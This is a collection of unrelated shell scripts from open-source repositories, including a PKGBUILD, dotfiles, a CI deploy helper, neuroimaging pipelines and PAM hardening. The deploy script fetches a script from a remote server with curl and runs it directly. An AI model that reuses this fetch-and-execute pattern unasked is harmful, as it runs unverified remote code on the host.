onFailed_SM_RUI $? "Error: there is no /etc/apt/apt.conf.d/50unattended-upgrades"
fi
echo unattended-upgrades unattended-upgrades/enable_auto_updates boolean true | debconf-set-selections
dpkg-reconfigure -f noninteractive unattended-upgrades
onFailed_SM_RUI $? "Error: can't generate /etc/apt/apt.conf.d/20auto-upgrades"
if [ -f "${uauto_upgrades_fp}" ]; then
cp "${uauto_upgrades_fp}" "${uauto_upgrades_fp}.orig"
cat <<-'EOFF' >${uauto_upgrades_fp}
//
// @src: https://blog.confirm.ch/unattended-upgrades-in-debian/
//
// Enable unattended upgrades.
APT::Periodic::Enable "1";
// Do "apt-get upgrade" every n-days (0=disable).
APT::Periodic::Unattended-Upgrade "3";
// Do "apt-get upgrade --download-only" every n-days (0=disable).
APT::Periodic::Update-Package-Lists "1";
// Do "apt-get upgrade --download-only" every n-days (0=disable).
APT::Periodic::Download-Upgradeable-Packages "1";
// Do "apt-get autoclean" every n-days (0=disable).
APT::Periodic::AutocleanInterval "7";
EOFF
else
onFailed_SM_RUI $? "Error: there is no /etc/apt/apt.conf.d/20auto-upgrades"
fi
set -o nounset
sed -i -E 's/^(email_address=).*$/\1gonzo.soc@gmail.com/g' "/etc/apt/listchanges.conf"
printf "$debug_prefix ${GRN_ROLLUP_IT} EXIT ${END_ROLLUP_IT} \n"
}
| true
|
d0e809a40c1dd2a237b994f48b79c64c493596f3
|
Shell
|
kth5/archpower
|
/sz/PKGBUILD
|
UTF-8
| 1,214
| 2.734375
| 3
|
[] |
no_license
|
# POWER Maintainer: Alexander Baldeck <alex.bldck@gmail.com>
# Maintainer: Bruno Pagani <archange@archlinux.org>
pkgname=sz
pkgver=2.1.12.5
pkgrel=3
pkgdesc="Modular parametrizable lossy compressor framework for scientific data"
arch=(x86_64 powerpc64le powerpc64 powerpc riscv64)
url="https://szcompressor.org/"
license=(BSD)
depends=(glibc gcc-libs)
makedepends=(cmake gcc-fortran hdf5 netcdf python python-numpy swig)
makedepends_powerpc64=(openmp)
makedepends_powerpc64le=(openmp)
makedepends_x86_64=(openmp)
source=(https://github.com/szcompressor/SZ/releases/download/v${pkgver}/sz-${pkgver}.tar.gz)
sha256sums=('32a820daf6019156a777300389d2392e4498a5c9daffce7be754cd0a5ba8729c')
build() {
openmp=ON
case "${CARCH}" in
powerpc|riscv64) openmp=OFF ;;
esac
cmake -B build -S SZ-${pkgver} \
-DCMAKE_INSTALL_PREFIX=/usr \
-DCMAKE_SKIP_RPATH=ON \
-DBUILD_FORTRAN=ON \
-DBUILD_HDF5_FILTER=ON \
-DBUILD_NETCDF_READER=ON \
-DBUILD_OPENMP=${openmp} \
-DBUILD_PYTHON_WRAPPER=ON \
-DBUILD_SZ_EXAMPLES=ON
make -C build
}
package() {
make -C build DESTDIR="${pkgdir}" install
install -Dm644 SZ-${pkgver}/copyright-and-BSD-license.txt -t "${pkgdir}"/usr/share/licenses/${pkgname}
rm "${pkgdir}"/usr/bin/test*
}
| true
|
c3e308e8cfb08ef8a221758cadc173315b943187
|
Shell
|
CNG/dotfiles_mac
|
/mods-available/base/functions/schedule-task
|
UTF-8
| 928
| 4.03125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Add cron job if it doesn't exist
#
# Usage: schedule-task 'line_as_will_appear_in_crontab' [ user ]
#
# Example: schedule-task '*/3 * * * * cd $MT; perl ./tools/run-periodic-tasks -verbose >> $MTLOGDIR/rpt.log 2>&1' www-data
#
# Idea from http://stackoverflow.com/a/8106460/172602
# Exit if any command returns nonzero or unset variable referenced.
set -o errexit -o pipefail -o nounset
task_exists () {
local tasks
if [[ $user = $(whoami) ]]; then
tasks=$(crontab -l)
else
tasks=$(sudo crontab -l -u $user)
fi
# printf "Existing tasks: \n\n%s\n" "$tasks"
[[ $tasks = *$task* ]]
}
add_task () {
if [[ $user = $(whoami) ]]; then
cat <(crontab -l) <(echo "$task") | crontab -
else
cat <(sudo crontab -l -u $user) <(echo "$task") | sudo crontab -u $user -
fi
}
main () {
local task=$1
local user=${2:-$(whoami)}
task_exists || add_task
task_exists
}
main "$@"
| true
|
808c4773aaabca039e6842b4ed3341f2168daaa7
|
Shell
|
mika-fischer/dotfiles
|
/bash/bashrc
|
UTF-8
| 5,226
| 3.4375
| 3
|
[] |
no_license
|
#----------------------------------------------------------------------------
# ~/.bashrc
# This file is read for interactive shells.
#----------------------------------------------------------------------------
#----------------------------------------------------------------------------
# Environment variables
#----------------------------------------------------------------------------
[[ -e ~/.bash_env ]] && source ~/.bash_env || true
#----------------------------------------------------------------------------
# Aliases
#----------------------------------------------------------------------------
[[ -e ~/.aliases ]] && source ~/.aliases || true
#----------------------------------------------------------------------------
# Generic interactive shell initialization
#----------------------------------------------------------------------------
[[ -e ~/.shrc ]] && source ~/.shrc || true
#----------------------------------------------------------------------------
# Shell options
#----------------------------------------------------------------------------
shopt -s checkwinsize
shopt -s cmdhist
shopt -s histappend
set -o vi
#----------------------------------------------------------------------------
# History
#----------------------------------------------------------------------------
HISTCONTROL=ignoredups
HISTFILESIZE=10000
HISTSIZE=10000
#----------------------------------------------------------------------------
# Completion
#----------------------------------------------------------------------------
if [ -z "$BASH_COMPLETION" ]; then
if [ -f /etc/bash_completion ]; then
source /etc/bash_completion
fi
fi
#----------------------------------------------------------------------------
# Helper functions
#----------------------------------------------------------------------------
function truncate_start
{
local trunc_symbol="..."
local maxlength="$1"
shift
local string="$@"
local length="${#string}"
if [[ "$length" -gt "$maxlength" ]]; then
local offset=$(( $length - $maxlength ))
echo -ne "${trunc_symbol}${string:$offset:$maxlength}"
else
echo -ne "${string}"
fi
}
function truncate_end
{
local trunc_symbol="..."
local maxlength="$1"
shift
local string="$@"
local length="${#string}"
if [[ "$length" -gt "$maxlength" ]]; then
echo -ne "${string:0:$maxlength}${trunc_symbol}"
else
echo -ne "${string}"
fi
}
function settitle
{
local str="${@}"
case "$TERM" in
xterm*|rxvt*|gnome*|konsole*)
echo -ne "\e]0;${str}\007"
;;
screen*)
echo -ne "\ek${str}\e\\"
;;
esac
}
function settitle_pipe
{
export PREV_COMMAND="${PREV_COMMAND}${@}"
local cmd=$(truncate_end 30 "$PREV_COMMAND")
case "$TERM" in
xterm*|rxvt*|gnome*|konsole*)
echo -ne "\e]0;${cmd}\007"
;;
screen*)
echo -ne "\ek${cmd}\e\\"
;;
esac
export PREV_COMMAND="${PREV_COMMAND} | "
}
#----------------------------------------------------------------------------
# Prompt
#----------------------------------------------------------------------------
RESET="\[\e[00m\]"
BLACK="\[\e[00;30m\]"
GRAY="\[\e[01;30m\]"
RED="\[\e[00;31m\]"
LRED="\[\e[01;31m\]"
GREEN="\[\e[00;32m\]"
LGREEN="\[\e[01;32m\]"
BROWN="\[\e[00;33m\]"
YELLOW="\[\e[01;33m\]"
BLUE="\[\e[00;34m\]"
LBLUE="\[\e[01;34m\]"
PURPLE="\[\e[00;35m\]"
LPURPLE="\[\e[01;35m\]"
CYAN="\[\e[00;36m\]"
LCYAN="\[\e[01;36m\]"
LGRAY="\[\e[00;37m\]"
WHITE="\[\e[01;37m\]"
if [[ $EUID == 0 || $UID == 0 ]]; then
USER_COLOR=$LRED
else
USER_COLOR=$GREEN
fi
[[ $USER == mfischer || $USER == mika ]] || P_USER="$USER"
[[ -n $SSH_CONNECTION ]] && P_HOST="$HOSTNAME"
[[ -n $P_USER && -n $P_HOST ]] && P_AT="@"
[[ -n $P_USER || -n $P_HOST ]] && P_COLON=":"
PS1="\
${YELLOW}\${P_CONDA}\
${USER_COLOR}${P_USER}\
${GREEN}${P_AT}\
${CYAN}${P_HOST}\
${RESET}${P_COLON}\
${LBLUE}\${P_PATH}\
${LRED}\${P_STATUS}\
${PURPLE}\${P_VCS}\
${RESET}\\\$ "
function my_prompt_command
{
# Exit code of last command
local RC=$?
[[ $RC -ne 0 ]] && P_STATUS="($RC)" || P_STATUS=""
if [[ -n $CONDA_DEFAULT_ENV ]]; then
P_CONDA="[$CONDA_DEFAULT_ENV${MAGENTA}]"
else
P_CONDA=""
fi
# Git branch display
if declare -F __git_ps1 >/dev/null 2>&1; then P_VCS=$(__git_ps1 "[%s]"); fi
# Get truncated path
[[ "$PWD" == "$HOME" ]] && local PWD2="~"
[[ -z "$PWD2" ]] && [[ "$PWD" == "$HOME/" ]] && local PWD2="~/"
[[ -z "$PWD2" ]] && local PWD2="${PWD/#$HOME\//~/}"
P_PATH=$(truncate_start 30 "$PWD2")
# Set xterm title and screen title
settitle "${P_USER}${P_AT}${P_HOST}${P_COLON}${P_PATH}"
# Hack to cut and paste together pipelined commands
export PREV_COMMAND=""
# Write new commands to history file
history -a
}
PROMPT_COMMAND='my_prompt_command'
trap 'settitle_pipe "$BASH_COMMAND"' DEBUG
#----------------------------------------------------------------------------
# Local bash initialization
#----------------------------------------------------------------------------
[[ -e ~/.bashrc.local ]] && source ~/.bashrc.local || true
# vim: ft=sh
| true
|
01f9f3077a0f7fbece3f45c119cdc8fa82370199
|
Shell
|
adunkman/deployasaur.us
|
/public/deploy.sh
|
UTF-8
| 2,979
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/bash
blue=$(tput setaf 4)
green=$(tput setaf 2)
yellow=$(tput setaf 3)
red=$(tput setaf 1)
reset=$(tput sgr0)
function print() {
echo "${blue}http://deployasaur.us:${reset} $1"
}
[[ $(git remote -v) =~ git://github.com/([^ ]+).git ]]
repository=${BASH_REMATCH[1]}
branch=$TRAVIS_BRANCH
build=$TRAVIS_BUILD_NUMBER
job=$TRAVIS_JOB_NUMBER
id=$TRAVIS_BUILD_ID
if [[ $TRAVIS_PULL_REQUEST != "false" ]]; then
print "woah there! dinosaurs never deploy pull requests."
print "${yellow}exiting without deploying.${reset}"
exit
fi
if [[ $TRAVIS_TEST_RESULT != "0" ]]; then
print "woah there! your tests didn't pass!"
print "${yellow}exiting without deploying.${reset}"
exit
fi
print "howdy $repository $branch build $build! nice to hear from you."
print "checking in with the dinosaur overlords..."
url="http://www.deployasaur.us/$repository/$branch/$build/script?job=${job}&id=${id}"
status=$(curl -s $url -o response -w %{http_code})
case $status in
200)
print "running your deployment script..."
chmod a+x response
echo ""
./response
code=$?
echo ""
if [ $code -eq 0 ]; then
print "${green}your deployment script has finished successfully (exit code $code).${reset}"
print "thankful? tweet @adunkman mentioning #deployasaurus"
else
print "${red}your deployment script failed (exit code $code).${reset}"
print "this is probably not an issue with deployasaur.us."
fi
print "reporting deployment status..."
url="http://www.deployasaur.us/$repository/$branch/$build/status?job=${job}"
status=$(curl -X PUT -d "code=$code" -s $url -o reportStatus -w %{http_code})
if [ $status -eq 200 ]; then
print "all done!"
else
print "${red}couldn't report deployment status: something strange happened (status $status).${reset}"
print "${red}response for debugging purposes:${reset}"
echo ""
echo $(cat reportStatus)
echo ""
print "${red}please file an issue with this complete output${reset}"
print "${red}issues url: http://github.com/adunkman/deployasaur.us/issues${reset}"
fi
;;
202)
print "${yellow}other jobs must check-in before deployment occurs.${reset}"
print "$(cat response)"
print "${yellow}exiting without deploying.${reset}"
;;
404)
print "${red}i don't know about this repository and branch.${reset}"
print "${red}are you sure you've created a deployment script for $repository/$branch?${reset}"
print "${yellow}exiting without deploying.${reset}"
;;
*)
print "${red}something strange happened (status $status).${reset}"
print "${red}response for debugging purposes:${reset}"
echo ""
echo $(cat response)
echo ""
print "${red}please file an issue with this complete output${reset}"
print "${red}issues url: http://github.com/adunkman/deployasaur.us/issues${reset}"
print "${yellow}exiting without deploying.${reset}"
;;
esac
print "bye now!"
| true
|
fcf4b7af76ee195982546a8667b1f1230abd0efd
|
Shell
|
amercader/WMS-Inspector
|
/build/build.sh
|
UTF-8
| 913
| 3.921875
| 4
|
[] |
no_license
|
#! /bin/sh
usage="Usage: $0 [-j -v version] directory"
version=""
dojar=false
while getopts 'jv:' option
do case "$option" in
v) version="$OPTARG";;
j) dojar=true;;
#[?]) print >&2 $usage
[?]) echo $usage
exit 1;;
esac
done
shift $(($OPTIND - 1))
if [ ! "$1" ]
then
echo "Parameter missing"
echo $usage
exit 1
fi
if [ ! -d "$1" ]; then
echo "Directory not found"
exit 1
fi
currentdate=$(date +%Y%m%d)
fulldate=$(date +%Y%m%d%H%M%S)
tmpdir=_tmp_$fulldate
if [ $version ]
then
extensionname=wmsinspector.$version.$currentdate.xpi
else
extensionname=wmsinspector.$currentdate.xpi
fi
cp -R $1 $tmpdir
cd $tmpdir
if [ $dojar = true ]
then
cd chrome
zip -qrm wmsinspector.jar .
cd ..
sed -i 's/chrome\//jar:chrome\/wmsinspector.jar!\//g' chrome.manifest
fi
zip -qr ../$extensionname . -x .git\*
cd ..
rm -rf $tmpdir
echo "XPI file created: "$extensionname
| true
|
f0c488cb5a524db573a4931b16a10ac8547a3a25
|
Shell
|
nakkumar/aiops
|
/AlienVault/mail-windows-script.sh
|
UTF-8
| 876
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/sh
# mkdir /home/$(whoami)/log
# touch /tmp/data_after1
# touch /tmp/data_before1
sudo tail /var/ossec/logs/alerts/alerts.log > /tmp/data_after1
msg=$(tail /tmp/data_after1)
error=$(tail /tmp/data_after1 | grep 'Win.Test.EICAR_HDB-1' | wc -l)
virus=$(tail /tmp/data_after1 | grep 'Win.Test.EICAR_HDB-1')
if cmp -s /tmp/data_after1 /tmp/data_before1
then
{
echo "NO NEW LOGS"
exit 0
}
else
{
if (( $error>=1 ));then
{
echo "VIRUS FOUND"
cp /tmp/data_after1 /tmp/data_before1
echo "virus Alert --> $virus" | mail -s "windows machine virus Alert" admin@zippyops.in
exit 2
}
else
{
echo "NO VIRUS"
cp /tmp/data_after1 /tmp/data_before1
exit 1
}
fi
}
fi
| true
|
b14a398f42c4987ab4a68fc6c3f6bc3618f3867f
|
Shell
|
inm7/vbc_mri_pipeline
|
/code/examples/train_HarvOxf_96R_gcs_step_1.sh
|
UTF-8
| 3,960
| 3.203125
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
#!/bin/bash
# train_HarvOxf_96R_gcs.sh
# ------------------------
# grp=HCP
# sbj=101309
grp=${1}
sbj=${2}
fp=/mnt_fp # /p/project/cjinm71/SC_Pipe_jung3/Neuroimage/Tools/freesurfer/subjects
ap=/mnt_ap # /p/project/cjinm71/SC_Pipe_jung3/Neuroimage/Atlas
tp=/mnt_tp # /p/scratch/cjinm71/jung3/03_Structural_Connectivity
atl=HarvardOxford/HarvardOxford-cortl-maxprob-thr0-1mm.nii.gz
mni_brain=/usr/share/fsl/5.0/data/standard/MNI152_T1_1mm_brain.nii.gz
# Call container_SC_dependencies
# ------------------------------
source /usr/local/bin/container_SC_dependencies.sh
export SUBJECTS_DIR=/opt/freesurfer/subjects
# Colors
# ------
RED='\033[1;31m' # Red
GRN='\033[1;32m' # Green
NCR='\033[0m' # No Color
tmp=${tp}/${grp}/${sbj}/temp
# Temporary folder check
# ----------------------
if [[ -d ${tmp} ]]; then
printf "${GRN}[Unix]${RED} ID: ${grp}${sbj}${NCR} - Temporary folder exists, so the process will overwrite the files in the target folder.\n"
else
printf "${GRN}[Unix]${RED} ID: ${grp}${sbj}${NCR} - Create a temporary folder.\n"
mkdir -p ${tmp}
fi
printf "${GRN}[Freesurfer]${RED} ID: ${grp}${sbj}${NCR} - Convert T1 brain: ${tmp}/fs_t1_brain.nii.gz.\n"
mri_convert ${fp}/${grp}_${sbj}/mri/brain.mgz ${tmp}/fs_t1_brain_ori.nii.gz
# AC-PC alignment
# ---------------
robustfov -i ${tmp}/fs_t1_brain_ori.nii.gz -b 170 -m ${tmp}/acpc_roi2full.mat -r ${tmp}/acpc_robustroi.nii.gz
flirt -interp spline -in ${tmp}/acpc_robustroi.nii.gz -ref ${mni_brain} -omat ${tmp}/acpc_roi2std.mat -out ${tmp}/acpc_roi2std.nii.gz -searchrx -30 30 -searchry -30 30 -searchrz -30 30
convert_xfm -omat ${tmp}/acpc_full2roi.mat -inverse ${tmp}/acpc_roi2full.mat
convert_xfm -omat ${tmp}/acpc_full2std.mat -concat ${tmp}/acpc_roi2std.mat ${tmp}/acpc_full2roi.mat
aff2rigid ${tmp}/acpc_full2std.mat ${tmp}/acpc.mat
convert_xfm -omat ${tmp}/acpc_inv.mat -inverse ${tmp}/acpc.mat
applywarp --rel --interp=spline -i ${tmp}/fs_t1_brain_ori.nii.gz -r ${mni_brain} --premat=${tmp}/acpc.mat -o ${tmp}/fs_t1_brain.nii.gz
printf "${GRN}[FSL]${RED} ID: ${grp}${sbj}${NCR} - AC-PC alignment: ${tmp}/acpc.mat and ${tmp}/acpc_inv.mat has been calculated.\n"
# Linear transformation from T1-weigted image to the MNI152 T1 1mm
# --------------------------------------------------------------------
flirt -ref ${mni_brain} -in ${tmp}/fs_t1_brain.nii.gz -omat ${tp}/${grp}/${sbj}/fs_t1_to_mni_affine.mat -dof 12
printf "${GRN}[FSL]${RED} ID: ${grp}${sbj}${NCR} - Linear transformation: ${tp}/${grp}/${sbj}/fs_t1_to_mni_affine.mat has been saved.\n"
# Non-linear transformation from T1-weigted image to the MNI152 T1 1mm
# --------------------------------------------------------------------
fnirt --in=${tmp}/fs_t1_brain.nii.gz --aff=${tp}/${grp}/${sbj}/fs_t1_to_mni_affine.mat --cout=${tp}/${grp}/${sbj}/fs_t1_to_mni_warp_struct.nii.gz --config=T1_2_MNI152_2mm
printf "${GRN}[FSL]${RED} ID: ${grp}${sbj}${NCR} - Non-linear transformation: ${tp}/${grp}/${sbj}/fs_t1_to_mni_warp_struct.nii.gz has been saved.\n"
# Apply the deformation to the atlas on the MNI152 T1
# ---------------------------------------------------
invwarp --ref=${tmp}/fs_t1_brain.nii.gz --warp=${tp}/${grp}/${sbj}/fs_t1_to_mni_warp_struct.nii.gz --out=${tp}/${grp}/${sbj}/mni_to_fs_t1_warp_struct.nii.gz
applywarp --ref=${tmp}/fs_t1_brain.nii.gz --in=${ap}/${atl} --warp=${tp}/${grp}/${sbj}/mni_to_fs_t1_warp_struct.nii.gz --out=${tp}/${grp}/${sbj}/HO_to_fs_t1.nii.gz --interp=nn
applywarp -i ${tp}/${grp}/${sbj}/HO_to_fs_t1.nii.gz -r ${tmp}/fs_t1_brain_ori.nii.gz -o ${tp}/${grp}/${sbj}/HO_to_fs_t1_ori.nii.gz --premat=${tmp}/acpc_inv.mat --interp=nn
printf "${GRN}[FSL]${RED} ID: ${grp}${sbj}${NCR} - Apply the deformation: ${tp}/${grp}/${sbj}/HO_to_fs_t1.nii.gz has been saved.\n"
# Convert image format and copy to subject image paths
# ----------------------------------------------------
mri_convert ${tp}/${grp}/${sbj}/HO_to_fs_t1_ori.nii.gz ${fp}/${grp}_${sbj}/mri/HarvardOxford_96R.mgz
| true
|
056958823ca45047dc4b6a3523f9ced21a0f23f7
|
Shell
|
josepht/home
|
/bin/bzr_setup.sh
|
UTF-8
| 291
| 3.25
| 3
|
[] |
no_license
|
#!/bin/sh
set -x
BZR_ROOT=$HOME/src/bzr
for PROJ in $BZR_PROJECTS; do
cd $BZR_ROOT
# Don't bother if the project already exists
if [ -d $PROJ ];then
continue
fi
mkdir $PROJ
cd $PROJ
bzr init-repo .
bzr branch lp:$PROJ trunk
bzr checkout --lightweight trunk current-work
done
| true
|
5df144a63a2ba41c32dbbaa936a60385ed2152cb
|
Shell
|
Soufas/rhel_centos_minimal_starter_package
|
/rhel_centos_starter_kit_minimal/files/nm_disable.sh
|
UTF-8
| 270
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
CHANGES=0
for IFCFG in /etc/sysconfig/network-scripts/ifcfg-* ;do
echo $IFCFG
OCCURENCE=$(grep NM_CONTROLLED $IFCFG |wc -l)
if [ $OCCURENCE == 0 ];
then
echo NM_CONTROLLED=false >> $IFCFG
CHANGES=$[ $CHANGES + 1 ]
fi
done
if [ $CHANGES -eq 0 ];then
exit 1
fi
| true
|
fd57d816fff586c2c3c10e43c4ec954429121319
|
Shell
|
CaeirOps/ec2spot-lambda-dotnet
|
/3-invoke.sh
|
UTF-8
| 415
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/bash
set -eo pipefail
#FUNCTION=$(aws cloudformation describe-stack-resource --stack-name ec2-spot --logical-resource-id function --query 'StackResourceDetail.PhysicalResourceId' --output text)
COUNTER=0
while [ $COUNTER -lt 3 ]; do
aws lambda invoke --function-name lambda-dev-test --region us-east-1 --payload '{"key": "value"}' out.json
cat out.json
echo ""
sleep 2
let COUNTER=COUNTER+1
done
| true
|
4293c0bed775cdb26f8d4fe1798ddd284c041d9a
|
Shell
|
pegasus-isi/ACME-Workflow
|
/plan.sh
|
UTF-8
| 888
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
SITE=local-pbs-titan
OUTPUT_SITE=local-pbs-titan
if [ $# -ne 1 ]; then
echo "Usage: $0 WORKFLOW_DIR"
exit 1
fi
WORKFLOW_DIR=$1
if [ -d "$WORKFLOW_DIR" ]; then
WORKFLOW_DIR=$(cd $WORKFLOW_DIR && pwd)
else
echo "No such directory: $WORKFLOW_DIR"
exit 1
fi
source $WORKFLOW_DIR/env.sh
DIR=$(cd $(dirname $0) && pwd)
SUBMIT_DIR=$WORKFLOW_DIR/submit
DAX=$WORKFLOW_DIR/dax.xml
TC=$WORKFLOW_DIR/tc.txt
RC=$WORKFLOW_DIR/rc.txt
SC=$DIR/sites.xml
PP=$DIR/pegasus.properties
echo "Planning workflow..."
pegasus-plan \
-Dpegasus.metrics.app=acme \
-Dpegasus.catalog.site.file=$SC \
-Dpegasus.catalog.replica=File \
-Dpegasus.catalog.replica.file=$RC \
-Dpegasus.catalog.transformation.file=$TC \
--conf $PP \
--dax $DAX \
--dir $SUBMIT_DIR \
--sites $SITE \
--output-site $OUTPUT_SITE \
--cleanup none \
--force
| true
|
cec223d59676e41e6c2a52b3dbd32a2822abbf6b
|
Shell
|
JayPhil2k19/main
|
/scr/auto-install.sh
|
UTF-8
| 1,438
| 3.78125
| 4
|
[] |
no_license
|
#! /bin/bash
#Menu Interface
menu_fnc(){
echo "System Setup Utility!"
PS3='Please make selection: '
local men_opt_ary=( "Install Software" "Information" "Exit")
local men_cho=
select men_cho in "${men_opt_ary[@]}"
do
case $men_cho in
"Install Software") install_fnc;;
"Information") info_fnc;;
"Exit") exit;;
*) echo "Invalid choice" ;;
esac
done
clear
return 0
}
#Setup Functions
install_fnc(){
clear
echo "Select software to install: "
PS3='Please make selection: '
local ins_opt_ary=( "Espeak" "Variety" "Virtual Box" "CarioDock" "Back <<" )
local ins_cho=
select ins_cho in "${ins_opt_ary[@]}"
do
sudo ls > /dev/null
case $ins_cho in
"Espeak") clear ; apt show espeak | more ; echo "Install?";;
"Variety") clear ; apt show variety | more;;
"Virtual Box") clear ; apt show virtualbox | more;;
"Cairo Dock") clear ; apt show cairo-dock | more;;
"Back <<") clear ; menu_fnc;;
*) echo "Invalid selection." ;;
esac
done
return 0
}
info_fnc(){
clear
echo "Software List: "
PS3='Please make selection: '
local inf_opt_ary=( "Espeak" "Variety" "Virtual Box" "CairoDock" "Back <<" )
local inf_cho=
select inf_cho in "${info_opt_ary[@]}"
do
case $inf_cho in
"Espeak") clear ; apt show espeak;;
"Variety") clear ; apt show variety;;
"Virtual Box") clear ; apt show virtualbox;;
"cairo Dock") clear ; apt show cairo-dock;;
"Back <<") clear ; menu_fnc;;
*) echo "Invalid selection" ;;
esac
done
#return 0
}
menu_fnc
| true
|
9120947ccf0d9bbba9d1a1b294404ce7c9eb2701
|
Shell
|
riterdando/dotfiles
|
/.bashrc
|
UTF-8
| 3,837
| 3.25
| 3
|
[] |
no_license
|
# -----------------------------------------------------------------------------
# Bash configuration, derived from SuSe sample .bashrc.
#
# There are 3 different types of shells in bash: the login shell, normal shell
# and interactive shell. Login shells read ~/.profile and interactive shells
# read ~/.bashrc; in our setup, /etc/profile sources ~/.bashrc - thus all
# settings made here will also take effect in a login shell.
#
# NOTE: It is recommended to make language settings in ~/.profile rather than
# here, since multilingual X sessions would not work properly if LANG is over-
# ridden in every subshell.
# -----------------------------------------------------------------------------
# ----- path settings ---------------------------------------------------------
PATH="${HOME}/bin:${PATH}"
# ----- additional Bash completions -------------------------------------------
if [[ -d ~/bash_completion.d/ ]] && \
! find ~/bash_completion.d/. ! -name . -prune -exec false {} +
then
for f in ~/bash_completion.d/*
do
source "$f"
done
fi
# somehow the fzf completions are not loaded automatically (we fix this later...)
source /usr/share/bash-completion/completions/fzf
source /usr/share/bash-completion/completions/fzf-key-bindings
# Gradle specifics
export GRADLE_COMPLETION_UNQUALIFIED_TASKS="true"
# ----- aliases settings ------------------------------------------------------
test -s ~/.alias && . ~/.alias || true
# enable color and hyperlinks, in order to make the links work with Kitty
alias ls='ls --color=auto --hyperlink=auto'
# enable displaying pictures in the terminal
alias icat='kitty +kitten icat'
# emacs related aliases
alias et='emacsclient -t'
alias en='emacsclient -c -n'
# ----- Emacs as default editor with daemon support --------------------------
export EDITOR="emacsclient -c -n"
export ALTERNATE_EDITOR=""
# ----- Powerline-Go command line prompt for Bash -----------------------------
function _update_ps1() {
PS1="$(${HOME}/bin/powerline-go -newline -hostname-only-if-ssh -numeric-exit-codes -cwd-max-depth 7 -error $?)"
}
if [ "$TERM" != "linux" ] && [ -f "${HOME}/bin/powerline-go" ]; then
PROMPT_COMMAND="_update_ps1; $PROMPT_COMMAND"
fi
# ----- Fuzzy Finder (fzf) ---------------------------------------------------
# Available keybindings:
# CTRL-T - Paste the selected files and directories onto the command-line
# Set FZF_CTRL_T_COMMAND to override the default command
# Set FZF_CTRL_T_OPTS to pass additional options
# CTRL-R - Paste the selected command from history onto the command-line
# If you want to see the commands in chronological order, press CTRL-R again which toggles sorting by relevance
# Set FZF_CTRL_R_OPTS to pass additional options
# ALT-C - cd into the selected directory
# Set FZF_ALT_C_COMMAND to override the default command
# Set FZF_ALT_C_OPTS to pass additional options
# using 'fd' as find tool...
export FZF_DEFAULT_COMMAND="fd --hidden --exclude '.git'"
export FZF_CTRL_T_COMMAND="$FZF_DEFAULT_COMMAND"
export FZF_ALT_C_COMMAND="$FZF_DEFAULT_COMMAND --type d"
# customize the fzf default options
export FZF_DEFAULT_OPTS="
--layout=reverse
--info=inline
--height=80%
--multi
--preview-window=:hidden
--preview '([[ -f {} ]] && (bat --style=numbers --color=always {} || cat {})) || ([[ -d {} ]] && (tree -C {} | less)) || echo {} 2> /dev/null | head -200'
--color='hl:148,hl+:154,pointer:032,marker:010,bg+:237,gutter:008'
--prompt='∼ ' --pointer='▶' --marker='✓'
--bind '?:toggle-preview'
--bind 'ctrl-a:select-all'
--bind 'ctrl-e:execute(emacsclient -c -n {+})'
"
# ----- broot -----------------------------------------------------------------
# (Try this out, may not be used due to fzf...)
source ${HOME}/.config/broot/launcher/bash/br
| true
|
7f44a0c60b824d6e84fe6e3e085bb36c8349854c
|
Shell
|
AutomateCompliance/complianceascode-content
|
/build-oval510/rhv4/fixes/bash/accounts_passwords_pam_faillock_interval.sh
|
UTF-8
| 2,986
| 3.46875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
# platform = multi_platform_rhel,multi_platform_fedora,multi_platform_ol,multi_platform_rhv
# Remediation is applicable only in certain platforms
if rpm --quiet -q pam; then
var_accounts_passwords_pam_faillock_fail_interval="(bash-populate var_accounts_passwords_pam_faillock_fail_interval)"
AUTH_FILES=("/etc/pam.d/system-auth" "/etc/pam.d/password-auth")
for pam_file in "${AUTH_FILES[@]}"
do
# is auth required pam_faillock.so preauth present?
if grep -qE '^\s*auth\s+required\s+pam_faillock\.so\s+preauth.*$' "$pam_file" ; then
# is the option set?
if grep -qE '^\s*auth\s+required\s+pam_faillock\.so\s+preauth.*'"fail_interval"'=([0-9]*).*$' "$pam_file" ; then
# just change the value of option to a correct value
sed -i --follow-symlinks 's/\(^auth.*required.*pam_faillock.so.*preauth.*silent.*\)\('"fail_interval"' *= *\).*/\1\2'"$var_accounts_passwords_pam_faillock_fail_interval"'/' "$pam_file"
# the option is not set.
else
# append the option
sed -i --follow-symlinks '/^auth.*required.*pam_faillock.so.*preauth.*silent.*/ s/$/ '"fail_interval"'='"$var_accounts_passwords_pam_faillock_fail_interval"'/' "$pam_file"
fi
# auth required pam_faillock.so preauth is not present, insert the whole line
else
sed -i --follow-symlinks '/^auth.*sufficient.*pam_unix.so.*/i auth required pam_faillock.so preauth silent '"fail_interval"'='"$var_accounts_passwords_pam_faillock_fail_interval" "$pam_file"
fi
# is auth default pam_faillock.so authfail present?
if grep -qE '^\s*auth\s+(\[default=die\])\s+pam_faillock\.so\s+authfail.*$' "$pam_file" ; then
# is the option set?
if grep -qE '^\s*auth\s+(\[default=die\])\s+pam_faillock\.so\s+authfail.*'"fail_interval"'=([0-9]*).*$' "$pam_file" ; then
# just change the value of option to a correct value
sed -i --follow-symlinks 's/\(^auth.*[default=die].*pam_faillock.so.*authfail.*\)\('"fail_interval"' *= *\).*/\1\2'"$var_accounts_passwords_pam_faillock_fail_interval"'/' "$pam_file"
# the option is not set.
else
# append the option
sed -i --follow-symlinks '/^auth.*[default=die].*pam_faillock.so.*authfail.*/ s/$/ '"fail_interval"'='"$var_accounts_passwords_pam_faillock_fail_interval"'/' "$pam_file"
fi
# auth default pam_faillock.so authfail is not present, insert the whole line
else
sed -i --follow-symlinks '/^auth.*sufficient.*pam_unix.so.*/a auth [default=die] pam_faillock.so authfail '"fail_interval"'='"$var_accounts_passwords_pam_faillock_fail_interval" "$pam_file"
fi
if ! grep -qE '^\s*account\s+required\s+pam_faillock\.so.*$' "$pam_file" ; then
sed -E -i --follow-symlinks '/^\s*account\s*required\s*pam_unix.so/i account required pam_faillock.so' "$pam_file"
fi
done
else
>&2 echo 'Remediation is not applicable, nothing was done'
fi
| true
|
